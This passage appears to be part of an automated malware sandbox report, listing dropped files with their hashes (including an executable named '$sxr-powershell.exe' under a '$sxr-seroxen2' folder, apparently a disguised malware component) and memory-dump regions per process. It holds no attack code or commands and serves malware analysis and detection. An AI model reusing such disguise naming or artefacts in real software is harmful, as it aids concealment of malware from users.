                                                                                                      c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                      SHA256

                                                                                                      a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                      SHA512

                                                                                                      2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                    • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe

                                                                                                      Filesize

                                                                                                      409KB

                                                                                                      MD5

                                                                                                      7417c8c73e614f293152575f46134216

                                                                                                      SHA1

                                                                                                      cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                      SHA256

                                                                                                      00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                      SHA512

                                                                                                      897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_un3e0xrr.qrh.ps1

                                                                                                      Filesize

                                                                                                      1B

                                                                                                      MD5

                                                                                                      c4ca4238a0b923820dcc509a6f75849b

                                                                                                      SHA1

                                                                                                      356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                      SHA256

                                                                                                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                      SHA512

                                                                                                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                      Filesize

                                                                                                      412B

                                                                                                      MD5

                                                                                                      a56f36683a1a710649d472a22d5db53a

                                                                                                      SHA1

                                                                                                      12795044cbe6f08917e3b59e1454c7b744ac4a99

                                                                                                      SHA256

                                                                                                      7a6eb6f1874af98560af5da84a46a88f29e4b784223d1b68f0667b0bff353cf2

                                                                                                      SHA512

                                                                                                      93596cfd63762dcdc6ec8a8110686c0481112bacf5514196306a23eedaad7152c24f2bb30a4306000d40bc16bc7463bb699ad36359c8bb003b03b1fe9fc18c56

                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                      Filesize

                                                                                                      3KB

                                                                                                      MD5

                                                                                                      75ef8920be65ae38b2154021b090b6bb

                                                                                                      SHA1

                                                                                                      bd228e800220ae93f140f51d455794fa6fe8d46a

                                                                                                      SHA256

                                                                                                      4d0e28ed36a24718e1546ffc10978fbd0a2fe86fa087358aa5ca561f2109bef6

                                                                                                      SHA512

                                                                                                      c3a393eb9160bf65c47e6d0035b530fa47ba0a16273caf9c67e6660670e97e77318076dd771bdb60480b12157e31aeeca373176dd513ae6776d8a667f10ed143

                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Filesize

                                                                                                      1KB

                                                                                                      MD5

                                                                                                      efe0903424c927d3611f8d8acd078b79

                                                                                                      SHA1

                                                                                                      22fda4e644f8fa0908493f40b930b1dff1755356

                                                                                                      SHA256

                                                                                                      79fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6

                                                                                                      SHA512

                                                                                                      8de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9

                                                                                                    • memory/580-75-0x0000022A61B90000-0x0000022A61BBB000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/580-69-0x0000022A61B90000-0x0000022A61BBB000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/580-66-0x0000022A61B60000-0x0000022A61B85000-memory.dmp

                                                                                                      Filesize

                                                                                                      148KB

                                                                                                    • memory/580-76-0x00007FFE97C30000-0x00007FFE97C40000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/580-67-0x0000022A61B90000-0x0000022A61BBB000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/636-86-0x00000273B7070000-0x00000273B709B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/636-87-0x00007FFE97C30000-0x00007FFE97C40000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/636-80-0x00000273B7070000-0x00000273B709B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/740-98-0x00007FFE97C30000-0x00007FFE97C40000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/740-91-0x000002358C120000-0x000002358C14B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/740-97-0x000002358C120000-0x000002358C14B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/896-109-0x00007FFE97C30000-0x00007FFE97C40000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/896-102-0x0000027FF7910000-0x0000027FF793B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/896-108-0x0000027FF7910000-0x0000027FF793B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/996-113-0x000002372C1A0000-0x000002372C1CB000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/2748-1264-0x0000000073240000-0x000000007392E000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.9MB

                                                                                                    • memory/2748-1265-0x0000000073240000-0x000000007392E000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.9MB

                                                                                                    • memory/2748-182-0x0000000006250000-0x000000000625A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/2748-14-0x0000000073240000-0x000000007392E000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.9MB

                                                                                                    • memory/2748-13-0x0000000073240000-0x000000007392E000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.9MB

                                                                                                    • memory/3104-20-0x0000000073240000-0x000000007392E000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.9MB

                                                                                                    • memory/3104-0-0x000000007324E000-0x000000007324F000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3104-1-0x00000000008F0000-0x000000000095C000-memory.dmp

                                                                                                      Filesize

                                                                                                      432KB

                                                                                                    • memory/3104-2-0x00000000056A0000-0x0000000005B9E000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.0MB

                                                                                                    • memory/3104-3-0x0000000005250000-0x00000000052E2000-memory.dmp

                                                                                                      Filesize

                                                                                                      584KB

                                                                                                    • memory/3104-4-0x0000000073240000-0x000000007392E000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.9MB

                                                                                                    • memory/3104-5-0x00000000052F0000-0x0000000005356000-memory.dmp

                                                                                                      Filesize

                                                                                                      408KB

                                                                                                    • memory/3104-6-0x0000000005F60000-0x0000000005F72000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/3104-7-0x0000000006350000-0x000000000638E000-memory.dmp

                                                                                                      Filesize

                                                                                                      248KB

                                                                                                    • memory/4456-50-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4456-52-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4456-51-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4456-61-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4456-49-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4456-54-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4456-55-0x00007FFED7BA0000-0x00007FFED7D7B000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.9MB

                                                                                                    • memory/4456-56-0x00007FFED7AF0000-0x00007FFED7B9E000-memory.dmp

                                                                                                      Filesize

                                                                                                      696KB

                                                                                                    • memory/5004-48-0x00007FFED7AF0000-0x00007FFED7B9E000-memory.dmp

                                                                                                      Filesize

                                                                                                      696KB

                                                                                                    • memory/5004-46-0x000001E94AAD0000-0x000001E94AAFA000-memory.dmp

                                                                                                      Filesize

                                                                                                      168KB

                                                                                                    • memory/5004-28-0x000001E94A950000-0x000001E94A9C6000-memory.dmp

                                                                                                      Filesize

                                                                                                      472KB

                                                                                                    • memory/5004-25-0x000001E94A780000-0x000001E94A7A2000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/5004-47-0x00007FFED7BA0000-0x00007FFED7D7B000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.9MB